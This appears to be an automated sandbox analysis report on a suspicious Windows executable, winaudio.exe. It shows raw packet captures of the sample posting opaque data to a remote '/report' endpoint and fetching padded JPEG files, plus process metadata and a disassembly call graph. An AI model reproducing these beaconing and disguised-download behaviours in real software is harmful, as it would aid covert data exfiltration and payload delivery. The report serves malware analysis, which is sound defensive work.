                      Jan 30, 2023 07:40:18.641310930 CET167INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                      Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:18.641345978 CET167INData Raw: 2d 22 6d e5 20 b0 58 b7 26 8e c0 30 33 8b 8c 44 3a c4 fb 4a db 8b 77 1c e4 76 c7 22
                      Data Ascii: -"m X&03D:Jwv"


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      7192.168.2.349712103.86.67.6610100C:\Users\user\Desktop\winaudio.exe
                      TimestampkBytes transferredDirectionData
                      Jan 30, 2023 07:40:18.912763119 CET169OUTPOST /apiplay/H_S_Timing/report HTTP/1.1
                      Connection:close
                      Accept-Language:utf-8
                      Content-Length:112
                      Content-Type:application/octet-stream charset=utf-8
                      host:41ku.cn
                      User-Agent:Mozilla/5.0
                      Data Raw: 57 15 d6 b9 26 3b 1c 36 4e 07 7d 53 2b 37 48 bd c3 54 2b ab 6b e5 eb 15 5d a3 bc 98 95 2f 34 c0 df 46 82 82 a1 fd 0e fc a6 d5 ea d7 4e 79 f8 8f 1d c3 9e 3b 55 a6 e1 a7 a1 d5 61 0e 65 9e 37 fc 79 0b dc 08 34 63 af 93 14 82 3a af ca c0 15 cb 4e fb 14 13 ce d4 82 4a be ee a1 f9 a5 0b e5 2e e2 40 ec b7 5d 8b 94 8d af fe 2e c6 f6 04 a6 3e
                      Data Ascii: W&;6N}S+7HT+k]/4FNy;Uae7y4c:NJ.@].>
                      Jan 30, 2023 07:40:19.399028063 CET170INHTTP/1.1 200 OK
                      Server: nginx/1.16.1
                      Date: Mon, 30 Jan 2023 06:40:19 GMT
                      Content-Type: text/html; charset=utf-8
                      Content-Length: 16
                      Connection: close
                      Data Raw: 54 dc ee 18 37 33 54 86 4f f1 85 71 4c 88 bb 41
                      Data Ascii: T73TOqLA


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      8192.168.2.349713104.193.88.11280C:\Users\user\Desktop\winaudio.exe
                      TimestampkBytes transferredDirectionData
                      Jan 30, 2023 07:40:19.938349962 CET170OUTGET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1
                      Host:pic.rmb.bdstatic.com
                      Connection:close
                      Jan 30, 2023 07:40:20.108556986 CET172INHTTP/1.1 200 OK
                      Server: JSP3/2.0.14
                      Date: Mon, 30 Jan 2023 06:40:20 GMT
                      Content-Type: image/jpeg
                      Content-Length: 5976
                      Connection: close
                      Expires: Thu, 02 Feb 2023 05:46:23 GMT
                      Last-Modified: Mon, 30 Jan 2023 05:46:23 GMT
                      ETag: "3c7bec031bab48d4084b19b5f2a8b07b"
                      Age: 3168
                      Accept-Ranges: bytes
                      Content-MD5: PHvsAxurSNQISxm18qiwew==
                      x-bce-content-crc32: 449646581
                      x-bce-debug-id: YnOB77IblCyOGJm2i8t1xcD3n7RChwIjRofu8XPDRO2Ildh+n9qjjIGHIikmMqb/rU4uATKWOLMuzjameV5Vtw==
                      x-bce-request-id: 6819dc9d-0aa8-4efa-9ced-f0c7cec76096
                      x-bce-storage-class: STANDARD
                      Timing-Allow-Origin: *
                      Ohc-Global-Saved-Time: Mon, 30 Jan 2023 05:46:23 GMT
                      Ohc-Cache-HIT: sfo01-sys-jorcol09.sfo01.baidu.com [2], zhuzuncache59 [4], xaix67 [1]
                      Ohc-File-Size: 5976
                      X-Cache-Status: HIT
                      Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 00 8c 00 8c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 00 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff c4 00 35 10 01 00 01 03 02 04 05 01 06 06 03 01 01 00 00 00 01 02 00 03 11 04 21 05 12 31 41 06 51 61 71 91 81 13 14 22 93 b1 d1 23 32 52 54 a1 c1 34 42 e1 33 f0 ff c4 00 18 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff c4 00 20 11 01 01 00 03 00 02 02 03 01 00 00 00 00 00 00 00 01 00 02 11 21 03 31 41 61 12 13 51 32 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 cf 93 c2 e4 a3 94 f9 a2 94 8c ed bd 04 4e bd 3c eb 4b 9a 72 19 c8 2e 4f 30 a5 21 1c bd 9e d9 a6 a0 a2 6f b5 1c e6 e7 3f a5 11 38 4c 54 df 1d 53 3d 69 73 2e dc 90 46 12 4f 3e 5d bd a9 3a 08 37 35 41 0b 6c d0 ce 03 38 f5 6b 4f a2 8b 28 24 ed a5 c8 b8 e5 4d c3 b3 fe 29 2e a6 1b ab f8 45 c9 e3 51 66 e0 82 8e c6 e2 1b 3f 15 a3 d3 69 ec 91 b5 67 76 2e f9 a8 26 98 8b f6 8c 08 49 5d 83 1b 77 a9 ba 78 4e d4 0e 75 51 d8 1c ed eb 52 d7 89 af 75 e5 bf c3 80 e8 18 c5 0b f7 54 63 1c 04 76 f5 a4 5a 97 39 1c 09 93 cf a5 22 e9 16 f1 3b 72
                      Data Ascii: JFIFHHC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"5!1AQaq"#2RT4B3 !1AaQ2?N<Kr.O0!o?8LTS=is.FO>]:75Al8kO($M).EQf?igv.&I]wxNuQRuTcvZ9";r
                      Jan 30, 2023 07:40:20.108606100 CET173INData Raw: 55 8b 19 39 70 fa e3 cf d6 b1 cb 77 46 01 b9 26 53 3d 56 b1 fe 2f e1 ba d9 eb 3e fd a7 b2 ce d1 0e 5b 84 51 5f 5c 75 3e 99 ad a4 20 44 37 cd 09 c0 63 94 2a 0c b4 ee a7 11 35 71 ab f3 79 b9 2d 99 50 3e 94 c3 12 2e 33 99 77 7c ab 65 e2 df b9 da 9f
                      Data Ascii: U9pwF&S=V/>[Q_\u> D7c*5qy-P>.3w|ejnJ!+4kl])S3pcojjFX{UCc[QiEJR]_k|t4S,QN/[b$%5v7-]6i$2GI+s]!q
                      Jan 30, 2023 07:40:20.108654022 CET174INData Raw: f9 6b 3c bc 7b f9 b4 c7 c9 af 8a f3 c5 bc 17 51 ce ea ac da bb 76 53 96 f8 82 a1 e5 b7 40 ac b4 74 5a c3 67 47 a8 ca ef fc 29 6d fe 2a 5b 29 1d 27 2f 96 92 ce 6e dc f3 f9 6a b1 c7 46 b7 27 3d bb d5 1e 1a 3d 5b 3c ba 3d 46 0f 3b 52 ed f4 ab 5f 0b
                      Data Ascii: k<{QvS@tZgG)m*[)'/njF'==[<=F;R_YCm0-gvpe?M]oGlcCb?3$_/WInZKr~dLdbC\n0\NXe."v_cjQ{S(
                      Jan 30, 2023 07:40:20.108701944 CET176INData Raw: b7 e0 2a 26 a7 a9 ed 5a 16 53 4b 49 7d e8 da 27 a5 13 2b ff 00 0f f8 95 e1 d6 cd 2e aa 2c f4 e2 b0 94 7a c3 3d 4c 77 2b 4f ab e2 ab a6 8d dd 3d d2 10 9c 79 a3 3c 67 23 dc ce d5 cd de b5 b4 e0 0b a9 f0 97 d9 de fc 51 b7 72 44 47 b7 7a c7 c9 80 76
                      Data Ascii: *&ZSKI}'+.,z=Lw+O=y<g#QrDGzvq}o\,szMQlH*XF'(|Q[rTLc`^wW?ZKVzzP:UJ000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:20.108747005 CET177INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                      Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:20.108789921 CET178INData Raw: b3 43 6e ba 4f fb 34 3e 4a 0a 5f 04 0c 86 7a 7b 09 e3 f5 ee 8a 50 7c 61 c0 41 09 c6 a3 e8 dd 32 e9 be 10 9a 23 23 a3 7c 65 54 50 c0 08 7d 92 a3 97 b8 a6 2b 94 3d 94 21 27 f5 65 fc 6d 7f b1 e4 e4 c6 87 0d 82 a4 0c 19 b5 32 c1 da 82 fa 03 01 ca 30
                      Data Ascii: CnO4>J_z{P|aA2##|eTP}+=!'em20O>gg4A?Ble6e!-_iGTkJ8g ._6\e%agOf.x3r<8e5LHWaUY_$l05}XF


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      9192.168.2.349714185.10.104.11580C:\Users\user\Desktop\winaudio.exe
                      TimestampkBytes transferredDirectionData
                      Jan 30, 2023 07:40:20.173821926 CET178OUTGET /bjh/72d383e033c22c163fbd95f76ba384b3.jpeg HTTP/1.1
                      Host:pic.rmb.bdstatic.com
                      Connection:close
                      Jan 30, 2023 07:40:20.194947958 CET180INHTTP/1.1 200 OK
                      Server: JSP3/2.0.14
                      Date: Mon, 30 Jan 2023 06:40:20 GMT
                      Content-Type: image/jpeg
                      Content-Length: 116159
                      Connection: close
                      Expires: Thu, 02 Feb 2023 05:46:07 GMT
                      Last-Modified: Mon, 30 Jan 2023 05:46:06 GMT
                      ETag: "72d383e033c22c163fbd95f76ba384b3"
                      Age: 344
                      Accept-Ranges: bytes
                      Content-MD5: ctOD4DPCLBY/vZX3a6OEsw==
                      x-bce-content-crc32: 3100584259
                      x-bce-debug-id: EsK+g5t4QcBJavs3xSRNAUumTxVVx2aJ1Rfg6S4SIVjoxBjDW//019xpFkSzzz+y4keA1S4P0aBZ+4KTGU9dJg==
                      x-bce-request-id: bb33c7e7-0878-4129-a26a-6923c4f42556
                      x-bce-storage-class: STANDARD
                      Timing-Allow-Origin: *
                      Ohc-Global-Saved-Time: Mon, 30 Jan 2023 05:46:07 GMT
                      Ohc-Cache-HIT: fra01-sys-jomo1.fra01.baidu.com [2], zhuzuncache60 [2], qdix190 [1]
                      Ohc-File-Size: 116159
                      X-Cache-Status: HIT
                      Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 00 8c 00 8c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 00 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff c4 00 35 10 01 00 01 03 02 04 05 01 06 06 03 01 01 00 00 00 01 02 00 03 11 04 21 05 12 31 41 06 51 61 71 91 81 13 14 22 93 b1 d1 23 32 52 54 a1 c1 34 42 e1 33 f0 ff c4 00 18 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff c4 00 20 11 01 01 00 03 00 02 02 03 01 00 00 00 00 00 00 00 01 00 02 11 21 03 31 41 61 12 13 51 32 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 cf 93 c2 e4 a3 94 f9 a2 94 8c ed bd 04 4e bd 3c eb 4b 9a 72 19 c8 2e 4f 30 a5 21 1c bd 9e d9 a6 a0 a2 6f b5 1c e6 e7 3f a5 11 38 4c 54 df 1d 53 3d 69 73 2e dc 90 46 12 4f 3e 5d bd a9 3a 08 37 35 41 0b 6c d0 ce 03 38 f5 6b 4f a2 8b 28 24 ed a5 c8 b8 e5 4d c3 b3 fe 29 2e a6 1b ab f8 45 c9 e3 51 66 e0 82 8e c6 e2 1b 3f 15 a3 d3 69 ec 91 b5 67 76 2e f9 a8 26 98 8b f6 8c 08 49 5d 83 1b 77 a9 ba 78 4e d4 0e 75 51 d8 1c ed eb 52 d7 89 af 75 e5 bf c3 80 e8 18 c5 0b f7 54 63 1c 04 76 f5 a4 5a 97 39 1c 09 93 cf a5 22 e9 16 f1
                      Data Ascii: JFIFHHC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"5!1AQaq"#2RT4B3 !1AaQ2?N<Kr.O0!o?8LTS=is.FO>]:75Al8kO($M).EQf?igv.&I]wxNuQRuTcvZ9"
                      Jan 30, 2023 07:40:20.194997072 CET181INData Raw: 3b 72 55 8b 19 39 70 fa e3 cf d6 b1 cb 77 46 01 b9 26 53 3d 56 b1 fe 2f e1 ba d9 eb 3e fd a7 b2 ce d1 0e 5b 84 51 5f 5c 75 3e 99 ad a4 20 44 37 cd 09 c0 63 94 2a 0c b4 ee a7 11 35 71 ab f3 79 b9 2d 99 50 3e 94 c3 12 2e 33 99 77 7c ab 65 e2 df b9
                      Data Ascii: ;rU9pwF&S=V/>[Q_\u> D7c*5qy-P>.3w|ejnJ!+4kl])S3pcojjFX{UCc[QiEJR]_k|t4S,QN/[b$%5v7-]6i$2GI+s]!
                      Jan 30, 2023 07:40:20.195044994 CET182INData Raw: 7f a9 f9 6b 3c bc 7b f9 b4 c7 c9 af 8a f3 c5 bc 17 51 ce ea ac da bb 76 53 96 f8 82 a1 e5 b7 40 ac b4 74 5a c3 67 47 a8 ca ef fc 29 6d fe 2a 5b 29 1d 27 2f 96 92 ce 6e dc f3 f9 6a b1 c7 46 b7 27 3d bb d5 1e 1a 3d 5b 3c ba 3d 46 0f 3b 52 ed f4 ab
                      Data Ascii: k<{QvS@tZgG)m*[)'/njF'==[<=F;R_YCm0-gvpe?M]oGlcCb?3$_/WInZKr~dLdbC\n0\NXe."v_cjQ{S(
                      Jan 30, 2023 07:40:20.195677042 CET184INData Raw: 6e 01 b7 e0 2a 26 a7 a9 ed 5a 16 53 4b 49 7d e8 da 27 a5 13 2b ff 00 0f f8 95 e1 d6 cd 2e aa 2c f4 e2 b0 94 7a c3 3d 4c 77 2b 4f ab e2 ab a6 8d dd 3d d2 10 9c 79 a3 3c 67 23 dc ce d5 cd de b5 b4 e0 0b a9 f0 97 d9 de fc 51 b7 72 44 47 b7 7a c7 c9
                      Data Ascii: n*&ZSKI}'+.,z=Lw+O=y<g#QrDGzvq}o\,szMQlH*XF'(|Q[rTLc`^wW?ZKVzzP:UJ0000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:20.195725918 CET185INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                      Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:20.195772886 CET186INData Raw: 2f 0b 60 66 e5 43 20 46 65 f9 83 8c b2 f0 0e 9f 1b 04 e6 f4 c6 6c fb 2a 56 d9 46 43 f4 5d cb 12 7d cb 45 15 f4 8f 42 6a 0b 69 fa 15 2b f1 82 e7 88 f8 bd c3 fd 6f 53 44 88 b0 e9 19 7d 44 57 1f 46 ce bd 79 f0 73 c8 4c 7b b0 c3 d0 7d a9 17 57 cd e6
                      Data Ascii: /`fC Fel*VFC]}EBji+oSD}DWFysL{}WN%F9#9F~~@:gd>G`h6NqQlzUbT57yp+dURF%gOl-zfX`fC Fe]YZp<,.6N,M4Y
                      Jan 30, 2023 07:40:20.196531057 CET188INData Raw: 75 8d dd 79 c7 f6 5f f9 4b 7b 2a 0e dc c3 aa 62 42 16 be 79 06 54 f4 2b fd 40 c2 45 77 83 ab 0c 24 6b 81 2f 3f 76 15 1d 7c fc f1 63 80 f6 4c 55 7c 55 a6 27 43 79 70 59 2a 8b 3d 5b 05 e5 c6 59 27 b7 82 bb d6 40 fd a3 1e 13 01 0b 6c 7a 55 62 54 f6
                      Data Ascii: uy_K{*bByT+@Ew$k/?v|cLU|U'CypY*=[Y'@lzUbT57yp+dUGt=+y0l_z]SoSD}DWFqC~k&:q1?"De=rUgkcxj?ZymjPkn"+2`fC Fe
                      Jan 30, 2023 07:40:20.196578026 CET189INData Raw: 3b 87 28 53 00 6d 89 b5 2f 63 fc 00 9d 1f 6c 7a 55 62 54 f6 35 85 37 f9 79 70 2b 64 f2 55 99 47 dd 96 c9 e1 f2 e9 39 9e a9 74 11 29 c3 44 e9 35 2d 61 e2 f0 15 bd b9 7f a3 a9 7b a6 2e eb bd c3 fd 6f 53 44 88 b0 e9 19 7d 44 57 1f 46 ce 17 0b 07 df
                      Data Ascii: ;(Sm/clzUbT57yp+dUG9t)D5-a{.oSD}DWFqC~k&:i&{irUgkcxj?YNP\%?&1[Z`fC FeZr80d4 :40}'Z5,ilZ$V(B
                      Jan 30, 2023 07:40:20.196624994 CET190INData Raw: 9c e6 c0 49 0d 32 16 07 bd c3 fd 6f 53 44 88 b0 e9 19 7d 44 57 1f 46 ce cf 52 e5 7e 5b 40 5f 2e 80 4a 2b 18 61 5b 5c eb ec 97 05 23 1d a7 d2 db 1d ea 3c 71 a0 3d 5e 5f bb f5 46 7e 7e 91 15 40 07 3a c2 da 67 0f 9a 18 68 16 a1 ee 2d 38 32 d8 21 6b
                      Data Ascii: I2oSD}DWFR~[@_.J+a[\#<q=^_F~~@:gh-82!k--Ugkcx$pch6NqQlzUbT57yp+dU`I@&hT+@Ew$k/b{+W#zB4t>Z5,il'%K9*#"^
                      Jan 30, 2023 07:40:20.197372913 CET192INData Raw: 21 af e0 a5 3c 3f a0 50 50 e1 c2 17 f4 f1 02 bf 97 73 31 e3 22 7a 9a b5 03 9f 06 54 f4 2b fd 40 c2 45 77 83 ab 0c 24 6b 81 2f 13 3a f0 45 fc 40 21 af 24 42 bb b0 dc b1 86 40 8d 82 d6 31 09 e6 c8 93 31 e3 22 7a 9a b5 03 9f 06 54 f4 2b fd 40 c2 45
                      Data Ascii: !<?PPs1"zT+@Ew$k/:E@!$B@11"zT+@Ew$k/"OXh6NqQlzUbT57yp+dUeYZp<,.6N4LZp<,.6NvZ4F[UZoSD}DWF#JSe{
                      Jan 30, 2023 07:40:20.197419882 CET193INData Raw: 06 13 8e 3a bd c3 fd 6f 53 44 88 b0 e9 19 7d 44 57 1f 46 ce 87 5a de f8 8c e7 0a 5a ac 88 44 63 f6 55 f3 7e 5a 35 88 2c fd ff b2 b7 69 80 19 ac 6c d2 e3 a3 61 88 77 90 8c 1d 0f 77 fe 3d e1 46 d9 7d 8b 36 06 54 f4 2b fd 40 c2 45 77 83 ab 0c 24 6b
                      Data Ascii: :oSD}DWFZZDcU~Z5,ilaww=F}6T+@Ew$k/xV>H]UgkcxM2eh6NqQlzUbT57yp+dUGt&q`fC FeCBzZp<,.6Nmr^oSD


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:07:39:59
                      Start date:30/01/2023
                      Path:C:\Users\user\Desktop\winaudio.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\winaudio.exe
                      Imagebase:0x2b0000
                      File size:702512 bytes
                      MD5 hash:D2367AD6988BB88F1B03CC7352F9696A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Target ID:1
                      Start time:07:40:00
                      Start date:30/01/2023
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff745070000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:8.1%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:15%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:44
                        execution_graph 37282 2db4a0 37283 2db4e4 ___scrt_fastfail 37282->37283 37347 2ddb40 37283->37347 37285 2db52b 37350 2d34e0 37285->37350 37287 2db544 37355 2d5a90 37287->37355 37289 2db562 37290 2db566 37289->37290 37291 2db5e3 37289->37291 37293 2db57c 37290->37293 37294 2db599 37290->37294 37378 2d7700 GetCurrentProcess OpenProcessToken 37291->37378 37517 2d2360 CloseHandle 37293->37517 37295 2db5ce 37294->37295 37296 2db5c7 CloseHandle 37294->37296 37372 2dbc70 37295->37372 37296->37295 37299 2db58e 37518 2d22f0 37299->37518 37300 2db5d9 37306 2e056d CatchGuardHandler 5 API calls 37300->37306 37301 2dbb27 37303 2dbb37 37301->37303 37310 2d22f0 2 API calls 37303->37310 37304 2db624 GetModuleFileNameA 37307 2dbb25 GetLastError 37304->37307 37344 2db5e8 ___scrt_fastfail 37304->37344 37305 2db616 Sleep 37305->37304 37308 2dbc61 37306->37308 37307->37301 37311 2dbb92 37310->37311 37316 2d22f0 2 API calls 37311->37316 37314 2db6dc RegOpenKeyExA 37314->37344 37315 2db6af CreateMutexA GetLastError 37317 2dbc31 37315->37317 37315->37344 37318 2dbbd0 WaitForSingleObject 37316->37318 37526 2d3580 Sleep CloseHandle CloseHandle 37317->37526 37525 2d5a00 FreeLibrary 37318->37525 37319 2dbc2a CloseHandle 37319->37317 37322 2dbc3c 37325 2dbc70 3 API calls 37322->37325 37323 2db71a RegQueryValueExA 37326 2db765 RegCloseKey 37323->37326 37323->37344 37324 2dbbe7 37328 2dbbf5 GetModuleFileNameA WinExec 37324->37328 37329 2dbc26 37324->37329 37327 2dbc47 37325->37327 37326->37344 37327->37300 37328->37329 37329->37317 37329->37319 37338 379320 122 API calls 37338->37344 37340 2dba08 CreateThread 37341 2dba2b ResumeThread 37340->37341 39947 2d2270 329 API calls 37340->39947 37341->37344 37342 2dba96 ResumeThread 37342->37344 37343 2dba71 CreateThread 37343->37342 39946 2d2270 329 API calls 37343->39946 37344->37301 37344->37304 37344->37305 37344->37314 37344->37315 37344->37319 37344->37323 37344->37326 37344->37338 37344->37340 37344->37341 37344->37342 37344->37343 37346 2dbb10 Sleep 37344->37346 37383 383728 37344->37383 37386 2dc9b0 37344->37386 37390 2dabe0 37344->37390 37400 2db3c0 WSAStartup 37344->37400 37408 2d5bf0 37344->37408 37412 38382b 37344->37412 37415 38379a 37344->37415 37418 383779 37344->37418 37421 3802fe 37344->37421 37430 2de750 37344->37430 37502 381153 37344->37502 37346->37344 37346->37346 37527 379180 37347->37527 37349 2ddb93 ___scrt_fastfail 37349->37285 37539 37e1a0 37350->37539 37353 2e056d CatchGuardHandler 5 API calls 37354 2d3576 37353->37354 37354->37287 37356 2d5aa1 LoadLibraryA 37355->37356 37357 2d5bd0 37355->37357 37358 2d5ab9 GetProcAddress 37356->37358 37359 2d5bc0 37356->37359 37357->37289 37358->37359 37361 2d5ad4 GetProcAddress 37358->37361 37541 2d5a00 FreeLibrary 37359->37541 37361->37359 37363 2d5aee GetProcAddress 37361->37363 37362 2d5bc5 GetLastError 37362->37289 37363->37359 37364 2d5b08 GetProcAddress 37363->37364 37364->37359 37365 2d5b22 GetProcAddress 37364->37365 37365->37359 37366 2d5b3c GetProcAddress 37365->37366 37366->37359 37367 2d5b52 GetProcAddress 37366->37367 37367->37359 37368 2d5b68 GetProcAddress 37367->37368 37368->37359 37369 2d5b7e GetProcAddress 37368->37369 37369->37359 37370 2d5b94 GetProcAddress 37369->37370 37370->37359 37371 2d5baa GetProcAddress 37370->37371 37371->37357 37371->37359 37376 2dbc9d 37372->37376 37373 2dbcc2 37374 2dbced CloseHandle 37373->37374 37375 2dbcf4 37373->37375 37374->37375 37375->37300 37376->37373 37377 2d22f0 2 API calls 37376->37377 37377->37373 37379 2d7757 37378->37379 37380 2d7722 37378->37380 37379->37344 37542 2d7140 37380->37542 37382 2d774e FindCloseChangeNotification 37382->37379 37551 383524 37383->37551 37387 2dc9c9 __except_handler4 37386->37387 37579 383142 37387->37579 37601 2dab00 37390->37601 37392 2dabf3 37393 2dabf7 37392->37393 37394 38382b 27 API calls 37392->37394 37393->37344 37395 2dac08 37394->37395 37396 38379a 38 API calls 37395->37396 37398 2dac0e 37396->37398 37397 383779 38 API calls 37397->37398 37398->37397 37399 2dac66 37398->37399 37399->37344 37401 2db3ef GetLastError 37400->37401 37402 2db40a socket inet_addr htons 37400->37402 37403 2e056d CatchGuardHandler 5 API calls 37401->37403 37402->37401 37404 2db46d connect 37402->37404 37405 2db406 37403->37405 37406 2e056d CatchGuardHandler 5 API calls 37404->37406 37405->37344 37407 2db48f 37406->37407 37407->37344 37409 2d5c07 __except_handler4 37408->37409 37410 383142 50 API calls 37409->37410 37411 2d5c11 DeleteFileA 37410->37411 37411->37344 37645 3837ac 37412->37645 37414 383848 37414->37344 37655 38bd56 GetLastError 37415->37655 37417 3837a4 37417->37344 37419 38bd56 _abort 38 API calls 37418->37419 37420 38377e 37419->37420 37420->37344 37422 38030b 37421->37422 37423 380319 37421->37423 37422->37423 37426 380330 37422->37426 37424 380e9e __dosmaperr 20 API calls 37423->37424 37429 380321 37424->37429 37427 38032b 37426->37427 37428 380e9e __dosmaperr 20 API calls 37426->37428 37427->37344 37428->37429 37679 37f971 26 API calls __wsopen_s 37429->37679 37431 2dea8c 37430->37431 37432 2de786 37430->37432 37433 2e056d CatchGuardHandler 5 API calls 37431->37433 37680 2df650 37432->37680 37434 2deaa5 37433->37434 37434->37344 37436 2de798 37685 2de070 37436->37685 37440 2de81f 37708 2de5d0 37440->37708 37444 2de830 37732 2d0420 37444->37732 37446 2de838 37447 3795d0 26 API calls 37446->37447 37448 2de85f 37447->37448 37743 2de310 37448->37743 37451 2d0490 26 API calls 37452 2de894 37451->37452 37453 2d0420 26 API calls 37452->37453 37454 2de89c 37453->37454 37455 3795d0 26 API calls 37454->37455 37456 2de8c3 37455->37456 37754 2de570 37456->37754 37458 2de8cb 37459 2d0490 26 API calls 37458->37459 37460 2de8d4 37459->37460 37461 2d0420 26 API calls 37460->37461 37462 2de8dc 37461->37462 37463 3795d0 26 API calls 37462->37463 37464 2de903 37463->37464 37763 2ddc90 37464->37763 37467 2d0490 26 API calls 37468 2de914 37467->37468 37469 2d0420 26 API calls 37468->37469 37470 2de91c 37469->37470 37471 3795d0 26 API calls 37470->37471 37472 2de943 37471->37472 37783 2de4e0 37472->37783 37474 2de94b 37475 2d0490 26 API calls 37474->37475 37476 2de954 37475->37476 37477 2d0420 26 API calls 37476->37477 37478 2de95c 37477->37478 37479 3795d0 26 API calls 37478->37479 37480 2de9a7 37479->37480 37790 2de4a0 37480->37790 37483 2d0490 26 API calls 37484 2de9b8 37483->37484 37485 2d0420 26 API calls 37484->37485 37486 2de9c0 37485->37486 37487 3795d0 26 API calls 37486->37487 37488 2de9e7 37487->37488 37793 2de460 37488->37793 37491 2d0490 26 API calls 37492 2de9f8 37491->37492 37493 2d0420 26 API calls 37492->37493 37494 2dea00 37493->37494 37495 3795d0 26 API calls 37494->37495 37496 2dea27 37495->37496 37796 2d8920 37496->37796 37499 2dea59 37501 2d0420 26 API calls 37499->37501 37500 3802fe ___std_exception_copy 26 API calls 37500->37499 37501->37431 37503 381160 37502->37503 37504 381175 37502->37504 37506 380e9e __dosmaperr 20 API calls 37503->37506 37950 38110a 37504->37950 37508 381165 37506->37508 37959 37f971 26 API calls __wsopen_s 37508->37959 37510 3811b7 37961 38107c 37510->37961 37511 38118a CreateThread 37513 3811ab GetLastError 37511->37513 37514 3811cc ResumeThread 37511->37514 37969 380ffd 37511->37969 37512 381170 37512->37344 37960 380e68 20 API calls __dosmaperr 37513->37960 37514->37510 37514->37513 37517->37299 37519 2d22f9 37518->37519 37520 2d230b 